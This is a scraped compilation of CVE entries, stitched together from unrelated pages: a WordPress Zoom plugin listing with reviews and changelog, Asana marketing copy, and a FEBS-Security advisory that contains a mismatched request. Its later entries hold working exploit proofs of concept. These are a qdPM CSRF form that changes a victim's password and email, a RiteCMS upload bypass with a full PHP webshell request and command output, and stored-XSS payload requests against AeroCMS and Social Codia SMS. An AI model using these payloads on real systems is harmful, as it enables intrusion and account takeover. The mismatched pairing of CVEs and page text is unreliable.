Cross-Site Request Forgery (CSRF) in StylemixThemes eRoom – Zoom Meetings & Webinar (WordPress plugin) <= 1.3.8 allows cache deletion.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remote type of work requires powerful tools to make sure all the business processes correspond to the level and are done without any loss.  
Video conferences, online meetings, and chat sessions play a significant role in providing and maintaining communication between participants and contribute to smooth collaboration in terms of distance interaction.

To make the process even more convenient, StylemixThemes developed eRoom – Zoom Meetings & Webinar WordPress Plugin to ensure you have a strong tool supporting your business.

⭐ Upgrade to eRoom Pro Features  
⭐ eRoom Documentation

eRoom plugin is natively integrated into bestselling WordPress themes:  
⭐ MasterStudy — Education WordPress Theme  
⭐ Consulting — Business & Corporate WordPress Theme

**Introducing eRoom – Zoom Meetings & Webinar WordPress Plugin**

eRoom – Zoom Meetings & Webinar WordPress Plugin provides you with great functionality of managing Zoom meetings, scheduling options, and users directly from your WordPress dashboard.  
The plugin is a free yet robust and reliable extension that enables direct integration of the world’s leading video conferencing tool Zoom with your WordPress website.

With the help of the plugin, you will be able to create and manage meetings making it easier for every user to participate.

**Zoom Webinars**

Zoom Webinars are an ideal solution for virtual lectures. It is a perfect way to conduct big online events and distribute them to large audiences.

Webinars make a valuable addition to the eRoom plugin and reflect the best practice of a one-to-many communication approach.

Webinars will be perfect for you if you:

*   offer virtual lectures;
*   distribute to a large audience;
*   use the listen-only mode;
*   want to diversify your content;
*   want to manage webinars directly from your dashboard.

With flexible Zoom plans, the number of webinar participants can be up to 10,000.

In eRoom plugin, you will be able to create webinars, add them to any page of the site, and sell them as WooCommerce Products. A convenient management system will be enjoyable for you and beneficial to your customers.

**Who Is It For?**

eRoom – Zoom Meetings & Webinar Plugin is a comprehensive tool, which is an indispensable and necessary solution for lots of educational institutions, consulting firms, and remote businesses.  
It is especially helpful while adapting to distance work. The plugin and the idea of video conferencing are applicable to a wide range of niches, especially it is beneficial for online learning.

This tool is suitable for conducting online training sessions, seminars and lectures, business meetings and online consultations.  
The service is developed for collaboration, training, and technical support and mainly aims to enhance the engagement among the participants.  
eRoom – Zoom Meetings & Webinar helps to shorten the distance and connect you with your coworkers regardless of your location.

**Main Features**

With eRoom – Zoom Meetings & Webinar Plugin you do not need to obtain and combine any other video conferencing solutions.  
It is a complete, comprehensive tool that connects your website with the ultimate eRoom – Zoom Meetings & Webinar service and provides you with lots of control options.

Features:

*   Compatible with WordPress
*   Provides integration of Zoom on WordPress
*   Compatible with Zoom API
*   Enables Zoom video conferencing features
*   Provides shortcode to conduct the meeting on any WordPress page
*   Has admins area to manage the meetings
*   Allows to add and manage users
*   Includes Zoom performance and engagement reports

**Syncing meetings with Google Calendar**

eRoom allows syncing meetings with calendars. You can easily import the meeting file to iCal or duplicate the information to Google Calendar. The only thing you have to do is save the event and set the reminder if you want. This feature is especially useful for those who have lots of appointments, making it easier to keep track and access meetings from their calendar.

**eRoom purchasable meetings**

For those who want to monetize the meetings or offer the customers something new, you can always upgrade eRoom plugin with the paid addon — eRoom purchasable meetings.

eRoom purchasable meetings will add more value to your business. With this tool, you can make your video conferences and webinars available for purchase as WooCommerce products. A great way to monetize your services in a digital format. Offer your customers consultations, and training as live sessions or recorded webinars and let them choose and buy the favorite product.

**Recurring Meetings**

Recurring meetings and webinars is another paid add-on that gives you the ability to create Zoom meetings with recurrency.  
It is enough to create a single meeting and each occurrence will be using the same meeting ID and settings.

Recurring events Increase engagement and productivity. It is especially beneficial for managers and team leads. It also allows holding regular check-ins making sure every user or customer is involved.

**Simple in usage**

Interaction between eRoom and WooCommerce plugins makes it very easy to create a purchasable meeting. All you need to do is to add your meeting as a new WooCommerce product which makes it available for users to buy. Users can join the meeting directly from the browser or Zoom app. There is also a possibility for them to interact with the host via messages.

*   Easily use it on any WordPress website without interruptions.
*   Integrate your website with the most popular conferencing platform Zoom.
*   Apply all the major video conferencing features from Zoom on your site.
*   Use shortcodes and builder modules to add meetings to any site page.
*   Enjoy an intuitive admins panel and effortlessly adjust settings.

**Promote your services in a new way**

Use purchasable meetings as a marketing tool. Find a new audience that will be interested in online webinars and will be ready to pay for it.

**Why You Should Use the Plugin**

eRoom – Zoom Meetings & Webinar WordPress plugin is the perfect solution for your website if you are interested in broadcasting live or hosting virtual events in real-time.  
High-definition video and audio and the ability to join for many participants are the primary things you get.  
Companies can stay connected with text, image, and audio file delivery over instant messaging communications.

The main objective of this plugin is to enable the meetings and joining them straight from the page of your WordPress website.  
The plugin lets you schedule meetings from the WordPress dashboard. There is a shortcode that is generated automatically and can be added to the page,  
so users can see a countdown before the meeting starts and join the meeting directly from the page.

The plugin allows you to use all the features provided by Zoom, such as:

*   Video conference option.
*   Manage participants
*   Live chat
*   Screen sharing option
*   Full-screen mode

**More Awesome Free Plugins by Stylemix**

⭐ Cost Calculator & Price Estimation Plugin  
⭐ Zoom Meetings and Webinars Plugin — eRoom  
⭐ BookIt – a free booking calendar plugin  
⭐ MasterStudy – All-in-One WordPress LMS Plugin  
⭐ Free Classifieds and Listings Plugin – uListing

This section describes how to install the plugin and get it working.

1.  Upload the plugin files to the `/wp-content/plugins/` directory, or install the plugin through the WordPress plugins screen directly.
2.  Activate the plugin through the ‘Plugins’ screen in WordPress
3.  Please find more details on Plugin Installation in documentation
4.  Set Up Page in Menu -> Zoom.

**How do users join the conference?**

Users will have two options. They can join the conference either via the browser or in the Zoom app. Both options provide the same experience.

**How can I manage the meetings, do I have to use Zoom itself?**

Everything is held in your dashboard, the plugin enables the full integration with the Zoom platform. So you use only the admin panel and create and manage Zoom meetings directly on your website.

**Do I have to create a separate page for the meeting or can I paste it to any site page?**

There are shortcodes and popular page builders modules that will help you to insert conference to any page on your website.

**Is it compatible with my theme?**

Yes, the plugin is compatible with any WordPress theme. Install it and enjoy the flawless performance.

**Am I able to manage users?**

The plugin settings allow you to add and manage users. But, you should remember that you can add users in accordance with the Zoom Plans, so they will be active for the chosen plan. More information about Zoom pricing plans you can find here: https://zoom.us/pricing

**Do I need a Zoom account?**

Yes, you should be registered in Zoom. Also, on the plan you are using there depends the number of hosts and users you can add.

**What if I want to save the webinar?**

You can do it, just use the URL link of the video, so users could watch it later. In addition to this, with eRoom purchasable meetings plugin you will be able even to sell your webinars and meetings. Learn more: https://stylemixthemes.com/zoom-meetings-webinar-plugin/

![](https://secure.gravatar.com/avatar/61bf65a54c1d67860455f03aff4286b6?s=60&d=retro&r=g)

I installed this plugin to test vs the Video Conferencing with Zoom plugin which I had already setup. I made a new meeting and enbedded the shortcode into a post. When I went to view the new meeting it took me to a page not found. When I embedded the meeting into a post and viewed the post it displayed a very nice time counter showing the time until the meeting would start, but when I tried to view the meeting in my browser it took me to the page not found. I made the meeting and published it but somehow it couldn't be found when I clicked 'view post' - what's up with that? I'm not going to waste my time trying to figure out something that should be easy. I'll stick with Video Conferencing with Zoom I guess, though it isn't perfect.

![](https://secure.gravatar.com/avatar/c29bc97c851ccc58116de75fa67119d2?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/a3a804c142a50fd0acd23bc9c00b8623?s=60&d=retro&r=g)

It is one of the best WordPress plugins I've ever used.

![](https://secure.gravatar.com/avatar/7b05f5217be5e6baef35ae2853b2df53?s=60&d=retro&r=g)

The free version of eRoom provides good amount of features. They have features which can convert a website to a live one. And the pro version has even greater features. We look forward to buy its pro version too for our startup after sometime

![](https://secure.gravatar.com/avatar/345dd3e75f90f478ad1b0f2bfb886dd3?s=60&d=retro&r=g)

Good plugin and very simple to use. One point to improve : Impossible to have the interpreter function. is a relase is planned ?

![](https://secure.gravatar.com/avatar/3e3d18725f08d08ccb952f436a1b360a?s=60&d=retro&r=g)

An excellent plug-in that meets all my business needs

Read all 50 reviews

“eRoom – Zoom Meetings & Webinar” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/0231b4ceb0d31b5de8d2d3d430db935d?s=32&d=mm&r=g) Stylemix

**1.3.9**

*   Security update

**1.3.8**

*   Security update

**1.3.7**

*   fixed: Check ‘wp\_get\_current\_user’ function

**1.3.6**

*   fixed: Mailchimp pluggable conflict fix

**1.3.5**

*   updated: Compatibility with WordPress 5.9
*   fixed: Minor visual bugs

**1.3.4**

New: MailChimp Integration. The notification with options to add the user’s data in our newsletters after activating the plugin

**1.3.3**

*   fixed: Removed Freemius SDK from plugin’s core (see the previous update about Freemius SDK)

**1.3.2**

*   new: Freemius SDK for better analytics and understanding

**1.3.1**

*   new: Added new feature roadmap for eRoom

**1.3.0**

*   new: Approve or block entry for users from specific countries/regions
*   new: New meeting e-mail notification for host
*   new: eRoom meeting frontend editing via Elementor
*   fixed: Daylight saving time in time zones
*   fixed: Date format on meeting page

**1.2.9**

*   updated: Nuxy submodule

**1.2.8**

*   fixed: Admin Dashboard notifications lag

**1.2.7**

*   updated: Admin Dashboard notifications updated

**1.2.6**

*   fixed: PRO Features button slider error
*   fixed: Minor PHP errors

**1.2.5**

*   new: Generate password option added

**1.2.4**

*   added: Feedback module inside eRoom settings
*   added: Roadmap voting in eRoom settings

**1.2.3**

*   new: iCal Export and Google Calendar added
*   fixed: Meeting grid styling on mobile devices
*   fixed: Checkbox fields “Require authentication to join for webinar”
*   updated: Shortcode for recurring meetings and category
*   updated: Meetings/webinars connected with Zoom Conference products excluded from the grid and hidden join button with password on single page

**1.2.2**

*   added: Table Details for recurring on admin panel
*   added: Registration form for webinar type
*   updated: changed label/description for fields
*   updated: renamed wpcfto to nuxy
*   updated: Zoom Web SDK API updated to 1.9.1
*   fixed: changed priority for eroom single page and fixed countdown

**1.2.1**

*   fixed: Meetings/webinars deleted from WordPress were not deleted from Zoom (now these will be deleted after deleted from trash)
*   fixed: Image appearance for eRoom shortcodes items

**1.2.0**

*   updated: Pagination for Users section
*   updated: Countdown for three-digit number of days
*   fixed: Zoom token expiration issue
*   fixed: Console error testTool.isMobileDevise is not a function
*   fixed: Set current date if date field is empty
*   fixed: time zone for Azores
*   new: Go Pro page added

**1.1.9**

*   updated: Zoom Web SDK API updated to 1.8.5
*   fixed: Zoom API 2.0 incompatibility issues fixed
*   fixed: Enforce Login and Join Before Host issues fixed
*   improvement: Join in browser 2nd step deleted – the users participate the meeting directly after clicking Join in browser button as attendee
*   improvement: Waiting room option added to Webinar and Meeting

**1.1.8**

*   **added**: Stylemix announcements in admin dashboard

**1.1.7**

*   fixed: time zone changes according to zoom

**1.1.5**

*   improvements: Integration with Bookit Calendar Appointments

**1.1.4**

*   fixed: show alternative host
*   fixed: issue with setting the meeting date later than 1970 that occurs in 32 bit system
*   improvements: hide api secret in frontend.
*   translations: changed meeting setting words ‘Host Join Start’ to ‘Host video’, ‘Start after participants’ to ‘Participant video’

**1.1.3**

*   fixed: date translations in webinar/meeting info
*   fixed: default webinar/meeting date was set to 1st Jan 1970 instead of current time
*   cosmetics: styled meeting/product views in Pearl theme

**1.1.2**

*   WPCFTO Framework updated

**1.1.1**

*   Zoom Meeting Start Time issue fixed.
*   Zoom Synchronization Timezone problem fixed.
*   Readme updated

**1.1.0**

*   Zoom Webinars Integrated.
*   Zoom Meetings & Webinars Synchronization feature added.
*   Single Webinar Shortcode added – \[stm\_zoom\_webinar post\_id=”” hide\_content\_before\_start=””\]
*   Zoom Webinar WPBakery Page Builder element added
*   Zoom Webinar Elementor Page Builder element added
*   Zoom Webinar Email field added to Join in Browser feature
*   Settings Quicklink added to Plugins page.
*   Default Timezone set to Meeting Settings.
*   Zoom menu name changed into eRoom.
*   STM\_ZOOM Class name changed into StmZoom.

**1.0.6**

*   Minor bug fixes.

**1.0.4**

*   Minor bug fixes.

**1.0.3**

*   WPBakery shortcode bug fixed.

**1.0.2**

*   Meetings Grid shortcake added
*   Single Meeting page added
*   Minor bug fixes.

**1.0.1**

*   Minor bug fixes.

**1.0**

*   First Version of Plugin.

CVE-2022-25615: eRoom – Zoom Meetings & Webinar

Insecure permissions configured in the userid parameter at /user/getuserprofile of FEBS-Security v1.0 allows attackers to access and arbitrarily modify users' personal information.

**There is a security vulnerability exists in FEBS-Security.**

\[Suggested description\] The user / getuserprofile method in FEBS security project lacks the verification of userid, so that any user can modify the personal information of other users through the user / updateuserprofile method. via a Google search in url:http://localhost:8080/user/updateUserProfile

\[Vulnerability Type\] Insecure permissions

\[Vendor of Product\] https://github.com/febsteam/FEBS-Security

\[Affected Product Code Base\] v1.0

\[Affected Component\] //受影响的组件 POST /web\_info/save.json HTTP/1.1 Host: localhost:9105 Content-Length: 213 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: application/json, text/javascript, _/_; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:9105 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:9105/web\_info/edit.action Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action Connection: close

name=Javaex%E8%AE%BA%E5%9D%9B&domain=http%3A%2F%2Fwww.javaex.cn%2F&email=291026192%40qq.com&recordNumber=%E8%8B%8FICP%E5%A4%8718008530%E5%8F%B7&license=1&statisticalCode= your xss payload

\[Attack Type\] Remote

\[Proof of concept\]

1.There are security vulnerabilities in the personal information modification module of this project. It is known from the source code that the function of modifying personal information is to judge the user according to the incoming userid.

    @RequestMapping("user/getUserProfile")
    @ResponseBody
    public ResponseBo getUserProfile(Long userId) {
        try {
            MyUser user = new MyUser();
            user.setUserId(userId);
            return ResponseBo.ok(this.userService.findUserProfile(user));
        } catch (Exception e) {
            log.error("获取用户信息失败", e);
            return ResponseBo.error("获取用户信息失败，请联系网站管理员！");
        }
    }
    
    @RequestMapping("user/updateUserProfile")
    @ResponseBody
    public ResponseBo updateUserProfile(MyUser user) {
        try {
            this.userService.updateUserProfile(user);
            return ResponseBo.ok("更新个人信息成功！");
        } catch (Exception e) {
            log.error("更新用户信息失败", e);
            return ResponseBo.error("更新用户信息失败，请联系网站管理员！");
        }
    }
    

2.Use burpsuite to capture packets and modify userid

![image-20220215135415477](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135415477.png)

3.The userid of the currently logged in user is 171, and the modified userid is 172.Enter the modify personal information page.

![image-20220215135703895](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135703895.png)

4.After modifying any content, click save. Get packet capture data.

![image-20220215135841905](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135841905.png)

5.After saving successfully, exit the current login user, switch to the user with userid 172 just modified, and enter the page of viewing personal information.Vulnerability recurrence completed.

![image-20220215140035912](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215140035912.png)

CVE-2022-27958: CVE-Request/febs.md at main · afeng2016-s/CVE-Request

Asana Desktop before 1.6.0 allows remote attackers to exfiltrate local files if they can trick the Asana desktop app into loading a malicious web page.

**Work on big ideas, without the busywork.**

From the small stuff to the big picture, Asana organizes work so teams know what to do, why it matters, and how to get it done.

Collect creative feedbackCollect creative feedback

Get budget sign-offGet budget sign-off

Launch brand campaignLaunch brand campaign

PROJECT MANAGEMENT**Stay organized and connected**

Bring your team’s work together in one shared space. Choose the project view that suits your style, and collaborate no matter where you are.

**Everhour**

For time tracking. Set up project budgets, track hours, and more in Asana.

**Microsoft Teams**

For communication. Add and collaborate on Asana tasks without leaving Teams.

**Google Sheets**

For reporting. Pull data from Asana into Sheets to make custom tables, charts, and more.

**Zoom**

For coordination. Turn action items from meetings into tasks in Asana right from Zoom.

**Adobe Creative Cloud**

For communication. See Asana tasks, get feedback, and more right from your Adobe apps.

**Google Calendar**

For time management. Add your Asana tasks to your calendar to see deadlines.

**Harvest**

For time tracking. Track time to record billable hours and create invoices in Asana.

**Dropbox**

For file sharing. Attach files from Dropbox to Asana tasks from the Asana task pane.

**Slack**

For communication. Add, assign, even comment on Asana tasks (and more) in Slack.

**Google Drive**

For file sharing. Attach files from Google Drive to Asana tasks from the task pane.

**Jira Cloud**

For coordination. Create Jira issues and track work without leaving Asana.

**Salesforce**

For coordination. Collaborate on Asana tasks for pre-sales needs in Salesforce.

**Gmail**

For coordination. Turn email into tasks in Asana right from your Gmail inbox.

**OneDrive**

For file sharing. Attach Microsoft files to your Asana tasks from the Asana task pane.

**Zapier**

For connecting apps. Connect with 1000+ apps to share data and automate routine work.

**Tableau**

For reporting. Pull data from Asana into Tableau to create custom dashboards.

**Sharepoint**

For file sharing. Attach files from Sharepoint to Asana tasks from the Asana task pane.

**Outlook**

For coordination. Turn emails into tasks in Asana right from your Outlook inbox.

**Office 365**

For communication. Stay up to date on work in Asana without leaving Microsoft groups.

**Box**

For file sharing. Attach files from Box to Asana tasks from the Asana task pane.

**Microsoft Power BI**

For reporting. Pull data from Asana into Power BI to create custom dashboards.

**Instagantt**

For scheduling. Make Gantt charts to see Asana tasks and more on timelines.

Reporting

**Get the whole picture. Finally.**

Keep an eye on your team's progress and workload. Get real-time charts and other visual highlights to share status, spot potential problems, and keep work on track.

CVE-2022-26877: Manage your team’s work, projects, & tasks online • Asana

qdPM 9.2 allows Cross-Site Request Forgery (CSRF) via the index.php/myAccount/update URI.

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)# Google Dork: NA# Date: 03/27/2022# Exploit Author: Chetanya Sharma @AggressiveUser# Vendor Homepage: https://qdpm.net/# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download# Version: 9.2# Tested on: KALI OS# CVE : CVE-2022-26180#---------------Steps to Exploit :   1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.  2) send it to victim.<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">      <input type="hidden" name="sf_method" value="put" />      <input type="hidden" name="users[id]" value="1" />       <input type="hidden" name="users[photo_preview]" value="" />      <input type="hidden" name="users[name]" value="AggressiveUser" />      <input type="hidden" name="users[new_password]" value="TEST1122" />      <input type="hidden" name="users[email]" value="administrator@Lulz.com" />      <input type="hidden" name="users[photo]" value="" />      <input type="hidden" name="users[culture]" value="en" />      <input type="submit" value="Submit request" />    </form>  </body></html>

CVE-2022-26180: qdPM 9.2 Cross Site Request Forgery ≈ Packet Storm

RiteCMS version 3.1.0 and below suffers from a remote code execution vulnerability in the admin panel. An authenticated attacker can upload a PHP file and bypass the .htacess configuration to deny execution of .php files in media and files directory by default.

\# Exploit Title: RiteCMS - File Upload Restriction Bypass to Remote Code Execution (Authenticated) \# Date: 2021-07-25 \# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) \# Vendor Homepage: https://ritecms.com/ \# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip \# Version: <= 3.1.0 \# Tested on: Windows 10, Ubuntu 18, XAMPP \# Google Dork: intext:"Powered by RiteCMS" \# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ \# Description # ################ \# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. \# There are 4 ways of bypassing the current file upload protection to achieve remote code execution. \# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved \# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved \# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file\_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file\_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php \# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" - RCE achieved $ cat .htaccess <Files \*.php> deny from all </Files> <Files ~ "webshell\\.php$"> Allow from all </Files> ################################### \# PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1\. Login as admin 2\. Go to Files Manager 3\. Choose a directory to upload .php file either media or files directory. 4\. Then, click Upload file > Browse.. 3\. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4\. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: \======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($\_GET\[base64\_decode('Y21k')\]);?> \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file\_name" \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_mode" 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize" 150 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_compression" 70 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_file\_submit" OK - Upload file \-----------------------------410923806710384479662671954309-- #################### \# Webshell access: # #################### \# Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id \# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """

CVE-2021-46367: RiteCMS version 3.1.0 suffers from a remote code execution in admin panel

Social Codia SMS v1 was discovered to contain an arbitrary file upload vulnerability via addteacher.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27349: GitHub - D4rkP0w4r/sms-Unrestricted-File-Upload-RCE-POC

Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27357: CVEs/POC.md at main · D4rkP0w4r/CVEs

Musical World v1 was discovered to contain an arbitrary file upload vulnerability via uploaded_songs.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27064: GitHub - D4rkP0w4r/Musical-World-Unrestricted-File-Upload-RCE-POC

AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via view_all_comments.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

**AeroCMS-Comment-Stored\_XSS-POC**

*   `Note` => Don't need register or login account
*   `Description` => `Stored_XSS` at comment box

**Step to Reproduct**

*   Click `Read More` -> input payload `<img/src/onerror=prompt(10)>` at `Author` -> click `Submit` button

**Exploit****Vulnerable Code****POC**

*   `Injection Point`

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

*   `Request`

POST /AeroCMS/post.php?p\_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p\_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

`POC VIDEO` https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing

CVE-2022-27063: GitHub - D4rkP0w4r/AeroCMS-Comment-Stored_XSS-Poc

Social Codia SMS v1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Title text field.

**sms-Add\_Student-Stored\_XSS-POC**

Description => Stored\_XSS at `Add Student`

**Step to Reproduct**

*   Login to admin -> `Students` -> `Add Student` -> input payload `<img/src/onerror=prompt(10)>` at `Enter Name`

**Exploit**

![image](https://user-images.githubusercontent.com/79050415/158715096-7fe6c540-b7cb-4293-b60f-f0e16b6d445c.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/158716291-52718f20-b719-44ef-a9ca-21b00e82b2de.png)

*   When inserting into the database, the input is not filtered out bad characters

**POC**

*   `Injection Point`

\------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>

*   `Request`

POST /sms/admin/addstudent.php HTTP/1.1
Host: localhost:8080
Content-Length: 992
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sms/admin/addstudent.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k
Connection: close

------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="image"; filename="car.png"
Content-Type: application/octet-stream


------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="rollno"

1234567
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="contact"

123456
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="standerd"

1
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="city"

Newyork
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="email"

haha@gmail.com
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="gender"

male
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryAvKt9LM2RnnkuA0K--

`POC VIDEO` https://drive.google.com/file/d/1PLRmIi7EBMAXkLMUhUy09PVph1CW6otF/view?usp=sharing

Tag

#google